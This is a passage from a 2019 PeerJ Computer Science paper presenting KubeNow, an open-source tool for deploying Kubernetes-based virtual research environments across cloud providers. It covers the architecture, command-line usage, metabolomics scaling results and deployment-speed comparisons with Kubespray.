with Microservices’). The methodology enables: (1) simplicity in VRE instantiation, (2) VRE allocation over commercial and commodity clouds and (3) scalable execution of scientific pipelines on cloud resources. • We provide an open source implementation, named KubeNow, that enables instantiating on-demand VREs on the major cloud providers (‘Implementation’). • We demonstrate the applicability and the scalability of our methodology by showing use cases and performance metrics from the PhenoMeNal project (‘Evaluation’). In connection to our first research question, concerning simplicity, this also contributes in showing how researchers with little IT expertise were able to autonomously allocate multi-node VREs using KubeNow. • We evaluate the scalability of KubeNow in terms of deployment speed and compare it with a broadly adopted microservice architecture installer (‘Deployment automation scalability’). MICROSERVICE-ORIENTED ARCHITECTURE AND TECHNOLOGY The microservice architecture is a design pattern where complex service-oriented applications are composed of a set of smaller, minimal and complete services (referred to as microservices) (Thönes, 2015). Microservices are independently deployable and compatible with one another through language-agnostic APIs, like building blocks. Hence, these blocks can be used in different combinations, according to the use case at hand. This software design promotes interoperability, isolation and separation of concerns, enabling an improved agile process where developers can autonomously develop, test and deliver services. Software container engines and container orchestration platforms constitute the cutting- edge enabling technology for microservices. This technology enables the encapsulation of software components such that any compliant runtime can execute them with no additional dependencies on any underlying infrastructure (Open Container Initiative, 2016). Such software components are referred to as software containers, application containers, or simply containers. Among the open source projects, Docker emerged as the de-facto standard software container engine (Shimel, 2016). Along with Docker, Singularity Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 3/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 has also seen considerable adoption by the scientific community as it improves security on high-performance computing systems (Kurtzer, Sochat & Bauer, 2017). Even though container engines like Docker and Singularity serve similar purposes as hypervisors, they are substantially different in the way they function. When running a VM, an hypervisor holds both a full copy of an Operating System (OS) and a virtual copy of the required hardware, taking up a considerable amount of system resources (Vaughan-Nichols, 2016). In contrast, software container engines leverage on kernel namespaces to provide isolation, thus running containers directly on the host system. This makes containers considerably lighter and faster to instantiate, when compared to VMs. Nevertheless, containers have a stronger coupling with the OS, thus if they get compromised an attacker could get complete access to the host system (Manu et al., 2016). Hence, in real-world scenarios a combination of both VMs and containers is probably what most organizations should strive towards. In current best practices, application containers are used to package and deliver microservices. These containers are then deployed on cloud-based clusters in a highly- available, resilient and possibly geographically disperse manner (Khan, 2017). This is where container orchestration frameworks are important as they provide cluster-wide scheduling, continuous deployment, high availability, fault tolerance, overlay networking, service discovery, monitoring and security assurance. Being based on over a decade of Google’s experience on container workloads, Kubernetes is the orchestration platform that has collected the largest open source community (Asay, 2016). Other notable open source orchestration platforms include Marathon (2018), which is built on top of the Mesos resource manager (Hindman et al., 2011), and Swarm which was introduced by Docker (Naik, 2016). ON-DEMAND VRES WITH MICROSERVICES In this section we introduce the methodology that enables on-demand VREs. The methodology is built around the microservice-oriented architecture, and its companion technology. Here we explain our solution on a high level, thus not in connection to any specific software product or vendor. Later in this paper (‘Implementation’) we also show an implementation of this methodology that builds on top of widely adopted open source tools and cloud providers. Architecture Figure 1 shows a general architecture for on-demand VREs. The architecture is organized in three layers: Cloud Provider, Orchestrator and Microservices. In describing each layer we follow a bottom-up approach. Cloud Provider At the lowest level, the Cloud Provider layer manages virtual resources at infrastructure level. In our methodology this layer enables to dynamically procure infrastructure when a VRE is instantiated. Physical resources can be outsourced (public cloud), in house (private cloud) or anywhere in between (hybrid cloud). Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 4/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 Figure 1 Microservice-oriented architecture for on-demand VREs. The architecture is organized in three layers: Cloud Provider, Orchestrator and Microservices. The two lowest layers offer necessary services to the above layer. In particular the Cloud Provider manages virtual resources at infrastructure level, and the Orchestrator manages microservices that run as application containers. The uppermost layer run a set of container-based microsrvices for a certain community of practice. The VRE is instantiated through a deployment automation, which may also configure a Content Delivery Network (CDN) and a Dynamic Domain Name System (DynDNS) to serve the User Interfaces. Full-size DOI: 10.7717/peerjcs.232/fig-1 There are a few necessary services that a cloud system should offer to serve the purpose of a VRE. First, a Compute service should enable for booting and managing the VMs that will provide computing power. Second, a Network service should provide management for VMs interconnection, routing, security rules and other networking-related concerns. Third, a Block Storage service should provide volumes management for VMs. Finally, an API should provide programmatic access to the all of the other services (to enable automation). Apart from these basic requirements, VREs need a few other services that may not be offered by commodity providers (such as moderately sized university installations). Luckily, their implementation as microservices is relatively easy as we describe in ‘Microservices’— and it is crucial in commodity settings. First, it is important to point out that the main purpose of VREs is to run computations through scientific tools. These tools can be run dispersively in the virtual cluster, thus needing a shared file space for synchronization and concurrent dataset handling. This cannot be provided via block storage, as usually it does not allow for concurrent access. Concurrent access may be achieved via Object Storage, a well-established storage service that is capable of providing shared file spaces (Karakoyunlu et al., 2013). As the name suggests the service manages files as objects, thus being substantially different from POSIX storage systems. This may represent a challenge in the context of VREs, as scientific tools can usually only operate on a locally-mounted POSIX space. However, this challenge can be tackled by third party products (such as Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 5/26 https://peerj.com https://doi.org/10.7717/peerjcs.232/fig-1 http://dx.doi.org/10.7717/peerj-cs.232 Cloudfuse (2019), that can abstract and mount the object storage as a POSIX file system. As an alternative to object storage, some cloud providers recently started to offer Shared POSIX Storage, which enables concurrent access on POSIX file spaces. Some examples include Amazon Elastic File System (2019), Google Cloud Filestore, (2019), Azure NetApp Files (2019) and OpenStack Manila (2019). Nevertheless, in contrast to object storage, this solution did not yet reach a consensus in terms of implementation and functionalities across different providers. Finally, a cloud provider may offer a Load Balance service. As the name suggests, this service can be used to load balance incoming traffic from a certain public IP to a configurable set of VMs or microservices. In the context of VREs, this can be useful to expose many services under a single public IP (as related quotas may be limited). Orchestrator As we mentioned in the introduction, our methodology makes use of application containers to improve the isolation of scientific software environments. A few cloud providers offer native management for container instances (Amazon Elastic Container Service, 2019; Google Cloud Run, 2019; Azure Container Instances, 2019; OpenStack Zun, 2019), nevertheless these solution are strongly coupled with vendor-specific tooling and they are seldom supported by commodity cloud systems. Hence, to promote portability of VREs, it is preferable to not rely on container-native cloud environments. However, when leveraging solely on VMs there is no straightforward way to manage disperse containers. This is where the Orchestrator is important, as it abstracts VM-based clusters so that containers can be seamlessly scheduled on the underlying resources. There are a few orchestration platforms available in the open source ecosystem (as we discussed in ‘Microservice-oriented architecture and technology’), and our methodology is not tied to any of these in particular. However, there are a few services that an Orchestrator should offer to support on-demand VREs. First, a Scheduling service should support cluster-wide resource management and scheduling for application containers. This service should also manage container replication across the cluster, and reschedule failed container (possibly to different nodes in case of VM failure). Since containers can be scheduled across many VMs, an Overlay Network should provide interconnection among them. In addition, a Service Discovery mechanism should provide the means to retrieve container addresses in the overlay network. This usually comes as a DNS service that should only be available inside the cluster. In order to provide data persistency and synchronization between replicas, a Volume Management service should offer container volumes operations across the cluster. This means that containers should be able to access a shared volume, possibly concurrently, from any host. Since this represents a major challenge, on this layer volume management should only represent an abstraction of an underlying storage system, such as a Block Storage or a Shared POSIX Storage. Apart from file spaces, the Orchestrator should be able to manage and mount secrets, such as encryption keys and passwords, in the containers through a Secret Management service. Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 6/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 Cloud Integrations may be optionally offered by the orchestrator, and be beneficial in the context of VREs. This service enables to dynamically provision resources on the underlying layer. For instance, on-demand VREs with Cloud Integrations may dynamically procure load balancers and cloud volumes for the managed containers. Finally, the Orchestrator should provide an API to allow programmatic access to its services (enabling automation). Microservices The set of services for a certain community of practice run as container-based microservices, on top of the orchestration platform. While we envision the previous layers to be exchangeable between communities of practice, this layer may offer substantially different functionalities, according to the application domain. Luckily, microservices-oriented systems for different scientific domains (e.g., PhenoMeNal, EXTraS and SKA) are very similar in their design, allowing us to give a general overview of this layer. First, we make a distinction between jobs and deployments. Jobs are mainly application containers that run scientific tools, to perform some analyses. The idea consists of instantiating each processing tool, execute a part of the analysis, and allowing it to exit as soon as the computation is done. In this way the analysis can be divided into smaller blocks and distributed over the cluster. Deployments should include a Workflow System, a Monitoring Platform and User Interfaces. Workflow Systems (or similar analytics services) enable to define and orchestrate distributed pipelines of containerized tools. For the containerized tools scheduling to work, it is crucial that the selected workflow system is compatible with the underlying Orchestrator. Monitoring Systems collect cluster-wide performance metrics, logs and audit trails, possibly aggregating them in visual dashboards. User Interfaces provide graphical access to the workflow and monitoring systems, and possibly enable interactive analysis through the execution of live code. An important remark is that as interfaces are typically stateless, their implementation as functions (Baldini et al., 2017) should also be considered when the integration with the workflow systems and the monitoring platform is feasible. Finally, on this layer Shared POSIX Storage, Object Storage and Load Balance may be implemented as container-based microservices, if not provided by the underlying commodity cloud service. Many available open source projects provide these services and support the major orchestration platforms, thus making the implementation relatively simple (see ‘Implementation’). Content delivery network and dynamic domain name system Content Delivery Networks (CDNs) are geographically disperse networks of proxy servers (Pathan & Buyya, 2007). The main goal of a CDN is to improve the quality of web services by caching contents close to the end user. Even though this is not particularly beneficial for short-lived systems, modern CDNs offer additional benefits that are relevant for on-demand VREs. In fact, when proxying web traffic, CDNs can provide seamless HTTPS encryption, along with some protection against common attacks (e.g., distributed denial of service). Since modern CDNs can be configured programmatically via APIs, this provides an easy way to setup encryption on-demand. When comparing with Let’s Encrypt (Manousis et al., 2016), this system has the advantage of seamlessly issuing and storing a single certificate. Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 7/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 This is relevant for on-demand systems, as they may need to be instantiated multiple times in a relatively short period of time, thus making important to reuse existing certificates. In contrast, Let’s Encrypt only enables to issue new certificates leaving their management up to the users. Dynamic Domain Name System (DynDNS) is a method that enables automatic DNS records update (Vixie et al., 1997). Since on-demand VREs are instantiated dynamically, each instance can potentially expose endpoints on different IP addresses. DynDNS enables to automatically configure DNS servers, so that endpoints will always be served on a configurable domain name. Even though we recommend adoption for user friendliness, CDNs and DynDNS are optional components. Secure Shell (SSH) tunnelling and virtual private network gateways are valid alternatives to securely access the endpoints. In addition, it is relatively simple to discover dynamically allocated IP addresses by using the cloud API. Deployment automation Setting up the presented architecture requires substantial knowledge of the technology, and it may represent a challenge even for a skilled user. Furthermore, for on-demand VREs this time-consuming task needs to be performed for each instantiation. Therefore, on-demand VREs should include a Deployment Automation. The automation should operate over multiple layers in the architecture, by setting up the infrastructure through the cloud API and by setting up the microservices through the orchestrator API. In addition, the automation should also configure the CDN and DynDNS when required. The deployment automation should be based on broadly adopted contextualization tools. These can be cloud-agnostic, thus supporting many cloud providers, or cloud specific. Cloud-agnostic tools are usually open source, while cloud-specific tools may be licensed. The former has the advantage of generalizing operations over many providers, while the latter might offer commercial support. No matter which set of contextualization tools is chosen, the deployment automation should offer a common toolbox that operates across all of the supported cloud providers. To this extent, contextualizing the system automatically across multiple commercial and commodity clouds is going to be challenging. For the Orchestrator layer one could in principle rely on managed setup automations. However, this approach has the disadvantage of tailoring the orchestration layer to vendor-specific tooling. The same stands when relying on managed storage and load balance. Further, these services are seldom provided by commodity clouds. Therefore, our recommendation is to automate the setup of the orchestration layer without relying on managed services—which also has the advantage of making this layer immutable across providers. Along the same lines, we recommend to automate the setup of storage and load balancing as microservices. This not only gives the user the possibility of deploying this services when not offered by the commodity cloud of choice, but also enables for not tailoring the analyses to any vendor-specific storage system. Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 8/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 IMPLEMENTATION We provide an open source implementation of our methodology, named KubeNow (KubeNow GitHub organization, 2019). KubeNow is generally applicable by design, as it does not explicitly define the uppermost layer in Fig. 1. Instead, KubeNow provides a general mechanism to define the microservices layer, so that communities of practice can build on-demand VREs according to their use cases. KubeNow is cloud-agnostic, and it supports Amazon Web Services (AWS), Google Cloud Platform (GCP) and Microsoft Azure, which are the biggest public cloud providers in the market (Bayramusta & Nasir, 2016), as well as OpenStack (the dominating in-house solution (Elia et al., 2017)). This is of great importance in science as it allows to take advantage of pricing options and research grants from different providers, while operating with the same immutable infrastructure. Furthermore, supporting in-house providers enables to process sensitive data, that may not be allowed to leave research centers. KubeNow implements Object Storage, Shared POSIX Storage and Load Balance in the microservices layer. This is a straightforward solution to maximize the portability of on-demand VREs. In fact, these services may not be available in certain private cloud installations, and their APIs tend to differ substantially across providers (requiring orchestrators and microservices to be aware of the current host cloud). On the other hand, leveraging on cloud-native services may be beneficial in some cases. As an example, using cloud-native storage enables to persist the data on the cloud, even when the on- demand VRE is not running. Thus, KubeNow gives the possibility to skip the provisioning of Object Storage, Shared POSIX Storage and Load Balance, leaving their handling to the communities of practice in such case. Finally, KubeNow is built as a thin layer on top of broadly-adopted software products. Below follows a summarizing list. • Docker (Shimel, 2016): the open source de facto standard container engine. • Kubernetes (Asay, 2016): the orchestration platform that has collected the largest open source community. • GlusterFS (GlusterFS, 2019): an open-source distributed file system that provides both shared POSIX file spaces and object storage. • Traefik (Traefik, 2019): an open-source HTTP reverse proxy and load balancer. • Cloudflare (Cloudflare, 2019): a service that provides CDN and DynDNS. • Terraform (Terraform, 2019): an open-source IaC tool that enables provisioning at infrastructure level. • Ansible (Ansible, 2019): an open-source automation tool that enables provisioning of VMs and Kubernetes. • Packer (Packer, 2019): an open-source packaging tool that enables packaging of immutable VM images. Configurability Figure 2 shows a sample KubeNow configuration. In a KubeNow cluster there are four main node entities that can be configured: master, service, storage and edge. Apart from Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 9/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 Figure 2 KubeNow sample configuration. There are four main node entities in a KubeNow cluster which are managed via Kubernetes. Apart from the master node, which runs the Kubernetes API, the user can chose how many instances of each node entities to deploy. Service nodes run the user application containers. Storage nodes run GlusterFS, and they attach a block storage volume to provide more capacity. Edge nodes run Traefik to load balance Internet traffic to the application containers, and each of them is associated to a public IP. Further, Cloudflare manages DNS records for the edge nodes IP, and optionally proxies Internet traffic to provide encryption. Full-size DOI: 10.7717/peerjcs.232/fig-2 the master node, the user can chose how many instances of each node entity to deploy. By default, each node shares the same private network that allows incoming traffic only on SSH, HTTP and HTTPS ports. The master node manages various aspects of the other nodes, retaining the cluster status and running the Kubernetes API. The current implementation of KubeNow does not support multiple master nodes. This is because the purpose of KubeNow is to enable on-demand processing on cloud resources. Under this assumption, deployments are supposed to be short lived, hence high availability is not crucial. Service nodes are general-purpose servers that typically run user containers. Storage nodes run GlusterFS, and they are attached to a block storage volume to provide additional capacity. Finally, edge nodes are service nodes with an associated public IP address, and they act as reverse proxies and load balancers, for the services that are exposed to the Internet. In order to resolve domain names for the exposed services, a wildcard record is configured in the Cloudflare dynamic DNS service (Cloudflare, 2019), such that a configurable base domain name will resolve to the edge nodes. In addition, the traffic can be proxied through the Cloudflare servers, using a fully encrypted connection. When operating in this mode Cloudflare provides HTTPS connections to the end user, and it protects against distributed denial of service, customer data breach and malicious bot abuse. Apart from the typical setting that we show in Fig. 2, some other configurations can be used. Excluding the master node, each node entity is optional and it can be set to any Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 10/26 https://peerj.com https://doi.org/10.7717/peerjcs.232/fig-2 http://dx.doi.org/10.7717/peerj-cs.232 $ kn init $ cd $ kn apply $ kn helm install (a) Manual configuration $ kn init --preset \ $ $ cd $ kn apply (b) Preset system Listing 1: KubeNow CLI user interaction. The init subcommand sets up a deployment directory for a certain cloud provider. When choosing to configure KubeNow manually the user does not specify any preset and moves to the deployment directory, where some configuration files need to be edited (see Listing 1b). Alternatively, one can chose to ini- tialize the deployment with a preset made available by the community of practice (see Listing 1b). The apply subcommand then deploys KubeNow as specified in the config- uration files. Lastly, the helm subcommand is used to install the application-specific re- search environment. When using the preset system this last step is not necessary, as the Helm packages that compose the VRE are installed automatically as specified in preset. replication factor. For instance, when IP addresses are particularly scarce, it is possible to not deploy any edge node, and to use the master node as reverse proxy instead (this may often be the case for commodity cloud settings). The same stands for the storage nodes, that can be removed when an external filesystem is available. In addition, for single-server setups, it is possible to deploy the master node only, and to enable it for service scheduling. Finally, since for entry-level users it can be difficult to reserve a domain name and set it up with Cloudflare, it is possible to use NIP.IO (NIP.IO, 2019) instead. NIP.IO provides for an easy mechanism to resolve domain names without needing any configuration (e.g., foo.10.0.0.1.nip.io maps to bar.10.0.0.2.nip.io maps to 10.0.0.2, etc.). Command-line interface The KubeNow deployment automation is available as a CLI, namely kn, that has the goal of making cloud operations transparent. Indeed, we envision researchers to autonomously set up cloud resources, without performing complex tasks outside their area of expertise. The kn CLI wraps around a Docker image that encapsulates Terraform, Ansible and a few other dependencies, hence Docker is the only client-side requirement. Listing 1a shows a typical user interaction. The user starts by initializing a deployment directory for a certain cloud provider with the kn init command. The deployment directory contains some template files that need to be filled in. These files can be used to configure how many of each of the available node entities to deploy (see ‘Configurability’), as well as low level parameters such as node flavors, networking and credentials. This way of configuring the deployment hides complex Kubernetes operations that would otherwise be needed to specialize the nodes. Once the user is done with the configurations, the deployment is started by moving into the deployment directory and by running the kn apply command. This command sets up Kubernetes as well as the KubeNow infrastrucuture (Fig. 2). Finally, the application-specific research environment is installed on top of KubeNow, by running Helm (2019) (the Kubernetes package manager). Even if preparing Kubernetes packages Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 11/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 requires substantial expertise, ready-to-use applications can be made available through Helm repositories. Listing 1b shows an easier way of deploying a VRE, which trades off configurability. Indeed, configuring the deployment can be hard for inexperienced users. Using the preset system, the user can specify a preset provided by the VRE’s community of practice which populates the configuration files with a common setup for the cloud provider of choice. In this way the user only needs to fill in the cloud credentials and optionally make some configuration adjustment. Following this approach, the configuration files also include the Helm packages that need to be installed, thus the kn apply command can bring up the complete setup automatically. Enabling scalable deployments Enabling fast and scalable deployments is crucial when leveraging cloud infrastructure on-demand. In fact, if the deployment time grows considerably when increasing the number of nodes, the VRE instantiation time likely dominates over the analysis time, making less appealing to invest in large-scale resources. In order to achieve fast and scalable deployments, there are two main ideas that we introduced in our automation. First, the instances are booted from a preprovisioned image (collaboratively developed via Travis CI, 2019). When the image is not present in the cloud user space, the deployment automation imports it, making all of the consecutive deployments considerably faster. Using this approach, all of the required dependencies are already installed in the instances at boot time, without paying for any time-consuming download. The second idea consists in pushing the virtual machines contextualization through Cloud-init (2019), by including a custom script in the instances bootstrap. In this way, the machines configure themselves independently at boot time leading to a better deployment time scaling, when compared to systems where a single workstation coordinates the whole setup process (as we show in ‘Evaluation’). This latter approach is even more inefficient when the deployment automation runs outside of the cloud network, which is a quite common scenario. EVALUATION We evaluate our methodology using KubeNow as implementation. Being based on Kubernetes, our system benefits from the resilience characteristics provided by the orchestration platform. Resilience in Kubernetes was previously discussed and studied (Vayghan et al., 2018; Netto et al., 2017; Javed et al., 2018) and it is trusted by several organizations (Neal, 2018); thus, we do not show a resiliency evaluation here. Instead, we show how the adoption of our methodology enable scientific analysis at scale (‘Full analysis scaling’). In particular, we show that running POSIX and object storage as microservices, through KubeNow, offer a scalable synchronization space for parallel scientific pipelines while enabling VREs on commodity clouds—thus validating the design that we show in Fig. 1. Further, we show how KubeNow scales in terms of deployment speed on each cloud provider, also in comparison with a broadly adopted Kubernetes installer (‘Deployment automation scalability’). Regarding this last point, it is not our intention to compare the Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 12/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 cloud providers in terms of speed or functionalities, but to show that the deployment scales well on each of them. Execution of scientific analysis KubeNow has been adopted by the PhenoMeNal project to enable the instantiation of on- demand VREs (Peters et al., 2018). The PhenoMeNal project aims at facilitating large-scale computing for metabolomics, a research field focusing on studying the chemical processes involving metabolites, which constitute the end products of processes that take place in biological cells. Setting up the required middleware manually, when running PhenoMeNal on demand, was originally a complex and repetitive task which made the whole process often infeasible. The adoption of KubeNow has helped the PhenoMeNal community to automate on-demand deployments that now boil down to running a few commands in the resercher’s workstation. On top of KubeNow, the PhenoMeNal VREs run a variety of containerized processing tools as well as three workflow systems, a monitoring platform and various user interfaces. More in detail, the VREs provide Luigi (Luigi, 2018), Galaxy (Goecks et al., 2010) and Pachyderm (Pachyderm, 2019) as workflow systems and the Elasticsearch Fluentd Kibana stack (Cyvoct, 2018) as monitoring platform, all of which come with their built-in user interfaces. In addition, PhenoMeNal VREs also provide Jupyter (Jupyter, 2019) to enable interactive analysis through a web-based interface. PhenoMeNal VREs have seen applications in mass spectrometry, nuclear magnetic resonance analyses as well as in fluxomics (Emami Khoonsari et al., 2018). Even though these three use cases come from metabolomics studies, they are substantially different and require different tools and pipelining techniques. This suggests that our methodology is generally applicable and supports applications in other research fields. Parallelization of individual tools Gao et al. (2019) and Novella et al. (2018) used the PhenoMeNal VREs to parallelize three individual metabolomics tools: Batman (Hao et al., 2012), FeatureFinderMetabo (FeatureFinderMetabo, 2018) and CSI:FingerID (Duhrkop et al., 2015). In these two studies different choices were made in terms of infrastructure setup, utilized workflow system and cloud provider. However, in both cases the parallelization was performed by splitting the data into N partitions, where N was also the number of utilized vCPUs, and by assigning each partition to a containerized tool replica. Gao et al. ran their analysis on 2000 1dimensional spectra of blood serum from the MESA consortium (Bild et al., 2002; Karaman et al., 2016), while Novella et al. processed a large-scale dataset containing 138 mass spectrometry runs from 37 cerebrospinal fluid samples (Herman et al., 2018). In both studies the performance is evaluated in terms of measured speedup when increasing the number of utilized vCPUs. The speedup was computed as TN /T1 where TN is the running time of the parallel implementation on N cores and T1 is the running time of the containerized tool on single core (measured on the same cloud provider). Gao et al. used the Luigi workflow system to parallelize Batman on Azure and on the EMBL-EBI OpenStack EMBL-EBI Cloud (2019) installation. When running on Azure they used 10 Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 13/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 81 158 340 413 420 17 31 41 50 38 73 150 158 19 36 48 63 16 32 64 128 256 512 vCPUs Sp ee du p Batman (EMBL-EBI OpenStack) FeatureFinderMetabo (AWS) Batman (Azure) CSI:FingerID (AWS) Linear (ideal) Figure 3 Speedup plot for three containerized tools. The plot shows speedups for three containerized tools that were parallelized using the PhenoMeNal on-demand VRE on different cloud providers. Please notice the logarithmic scale (in base 2) on both axes. Full-size DOI: 10.7717/peerjcs.232/fig-3 service nodes with 32 vCPUs and 128GB of RAM each, and 1 storage node with 8 vCPUs and 32GB of RAM. On the EMBL-EBI OpenStack they used 55 worker nodes with 22 vCPUs and 36GB of RAM each, and 5 storage nodes with 8 vCPUs and 16GB of RAM each. Under these settings they run on 50, 60, 100, 250 and 300 vCPUs on Azure, and on 100, 200, 500, 800 and 1000 vCPUs on the EMBL-EBI OpenStack. Novella et al. used the Pachyderm workflow system to parallelize FeatureFinderMetabo and CSI:FingerID on AWS. They run their experiments on AWS, using the t2.2xlarge instance flavor (eight vCPUs and 32GB of RAM) for each node in their clusters. They used five service nodes and three storage nodes when running on 20 vCPUs, eight service nodes and four storage nodes when running on 40 vCPUs, 11 service nodes and six storage nodes when running on 60 vCPUs, and 14 service nodes and seven storage nodes when running on 80 vCPUs. Figure 3 shows the measured speedup for each tool in the referenced studies. Even though these tools differ in terms of CPU and I/O demands, their speedup has a close to linear growth up to 500 vCPUs. For the Batman use case, the speedup starts to level out at 300 vCPUs when running on Azure and at 800 vCPUs when running on the EMBL-EBI OpenStack. However, we point out that Gao et al. used only one storage node when running on Azure, meaning that in such case more I/O contention occurred. Full analysis scaling Emami Khoonsari et al. (2018) used the PhenoMeNal VRE to scale the preprocessing pipeline of MTBLS233, one of the largest metabolomics studies available on the Metabolights repository (Haug et al., 2012). The dataset consists of 528 mass spectrometry samples from whole cell lysates of human renal proximal tubule cells. This use case is substantially different from the previous benchmarks, as the analysis was composed by several tools chained into a single pipeline, and because the scalability was evaluated over Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 14/26 https://peerj.com https://doi.org/10.7717/peerjcs.232/fig-3 http://dx.doi.org/10.7717/peerj-cs.232 10 20 30 40 0 0.2 0.4 0.6 0.8 1 vCPUs W SE Figure 4 WSE plot for the MTBLS233 pipeline. The plot shows the Weak Scaling Efficiency (WSE) for the MTBLS233 pipeline, executed using the PhenoMeNal on-demand VRE on an OpenStack-based provider. Full-size DOI: 10.7717/peerjcs.232/fig-4 the full workflow. However, the parallelization was again implemented by assigning a roughly equal split of the data to each container replica. The scalability of the pipeline was evaluated by computing the Weak Scaling Efficiency (WSE) when increasing the number of utilized vCPUs. The pipeline was implemented using the Luigi workflow system on the SNIC Science Cloud (SSC) (Toor et al., 2017), an OpenStack-based provider, using the same instance flavor with 8 vCPUs and 16GB of RAM for each node in the cluster. To compute the WSE, the analysis was repeatedly run on 1/4 of the dataset (10 vCPUs), 2/4 of the dataset (20 vCPUs), 3/4 of the dataset (30 vCPUs) and on the full dataset (40 vCPUs). Then, for N =10,20,30,40 the WSE was computed as T10/TN where T10 was the measured running time on 10 vCPUs and TN was the measured running time on N vCPUs. Figure 4 shows the WSE measures. There was a slight loss in terms of WSE when increasing the vCPUs, however at full regimen the Khoonsari et al. measured a WSE of 0.83 indicating good scalability. The loss in WSE is due to growing network contention when increasing the dataset size. This problem can be mitigated by implementing locality-aware scheduling for containers (Zhao, Mohamed & Ludwig, 2018), and we leave this as future work. Deployment automation scalability In order to evaluate how KubeNow deployment automation scales over different cluster sizes, we measured and analyzed its deployment time for each of the supported cloud providers: AWS (Frankfurt region), Azure (Netherlands region), GCP (Belgium region) and OpenStack (provided by EMBL-EBI Cloud (2019) and located in the United Kingdom). Then, where applicable, we repeated the measurements using Kubespray (2019), a broadly- adopted Kubernetes cloud installer, to make a comparison. The experiments were carried out from a local laptop, thus envisioning the common scenario where a researcher needs to set up a one-off cluster, in a remote cloud project. More specifically, the laptop was Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 15/26 https://peerj.com https://doi.org/10.7717/peerjcs.232/fig-4 http://dx.doi.org/10.7717/peerj-cs.232 an Apple MacBook Pro (model A1706 EMC 3071) running on the Uppsala University network (Sweden). We measured time for multiple instantiations on the supported cloud providers, doubling the size for each cluster instance. Apart from the size, each cluster had the same topology: one master node (configured to act as edge), and a 5-to-3 ratio between service nodes and storage nodes. This service-to-storage ratio was shown to provide good performance, in terms of distributed data processing, in our previous study (Emami Khoonsari et al., 2018). Hence, we started with a cluster setup that included one master node, five service nodes and three storage nodes (eight nodes in total, excluding master) and, by doubling size on each run, we scaled up to 1 master node, 40 service nodes and 24 storage nodes (64 nodes in total, excluding master). For each of these setups we repeated the measurement five times, to consider deployment time fluctuations for identical clusters. Finally, the flavors used for the nodes were: t2.medium on AWS, Standard_DS2_v2 on Microsoft Azure, n1-standard-2 on GCP, and s1.modest on EMBL-EBI OpenStack. Comparison between KubeNow and Kubespray To make the comparison as fair as possible, we used the Kubespray deployment automation that is based on Ansible and Terraform (the same tools that are used in KubeNow), which uses a bastion node to enable the provisioning with a single IP address. It is worth repeating that public address scarcity is a common issue when dealing with commodity cloud installations, hence we tried to minimize their usage in our experiments. For large deployments, the Kubespray documentation recommends to increase the default maximum parallelism in Ansible and Terraform. Since in our experiments we planned to provision up to 64 nodes, we set the maximum parallelism to this value for both KubeNow and Kubespray. To the best of our knowledge, Kubespray makes storage nodes available only for OpenStack deployments, hence the comparison was possible only on the EMBL-EBI OpenStack provider. Figure 5 shows the results for KubeNow and Kubespray in comparison. Deployment time fluctuations for repeated runs, with the same cluster size, were not significant. However, there is a significant difference in terms of scalability between the two systems. In fact, we observe that Kubespray deployments scale poorly, as they increase in time by a large factor when the cluster size doubles. On the other hand, when doubling the number of nodes, KubeNow time increases by a considerably smaller factor, thus providing better scalability. The gap between the two systems becomes of bigger impact as the deployments increase in size. In fact, for the biggest deployment (64 nodes) KubeNow is ∼12 times faster than Kubespray. To understand why such a big difference occurs, it is important to highlight how the deployment automation differs in the two systems. Kubespray initiates deployments from vanilla images, and it orchestrates the installation from a single Ansible script that runs in the user workstation (outside of the cloud network). Provisioning vanilla images is not only more time consuming, but it also causes more and more machines to pull packages from the same network as the deployments increase in size, impacting scalability. In the same way, the central Ansible provisioner that orchestrates Kubespray’s deployments becomes slower and slower in pushing configurations as the number of nodes increases. As we mentioned Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 16/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 0 500 1000 1500 2000 2500 3000 3500 4000 4500 5000 5500 6000 6500 8 16 32 64 D e p lo ym e n t ti m e ( s) Number of nodes KubeNow (EMBL-EBI OpenStack) Kubespray (EMBL-EBI OpenStack) Figure 5 KubeNow and Kubespray deployment time comparison. The plot shows the deployment time, for different cluster sizes (number of nodes), when using KubeNow and when using Kubespray. The ex- periments were performed on the EMBL-EBI OpenStack. Error bars for KubeNow can be seen on Fig. 6. Full-size DOI: 10.7717/peerjcs.232/fig-5 Figure 6 KubeNow deployment time by cloud provider. The plot shows the deployment time for differ- ent cluster sizes (number of nodes) on each of the supported cloud providers. Full-size DOI: 10.7717/peerjcs.232/fig-6 earlier, KubeNow solves these problems by starting deployments from a preprovisioned image, and by decentralizing the dynamic configuration through cloud-init. Evaluation on multiple cloud providers Figure 6 aims to highlight interesting differences in KubeNow’s deployment scaling over different cloud providers. Again, deployment time fluctuations for repeated runs, with the same cluster size, were not significant. We got the best scaling on GCP and EMBL-EBI OpenStack, where every time we doubled the number of provisioned nodes we measured a considerably small increase in deployment time. When deploying on Azure, we always measured a slightly longer time than on the other providers, which increased by a relatively Capuccini et al. (2019), PeerJ Comput. Sci., DOI 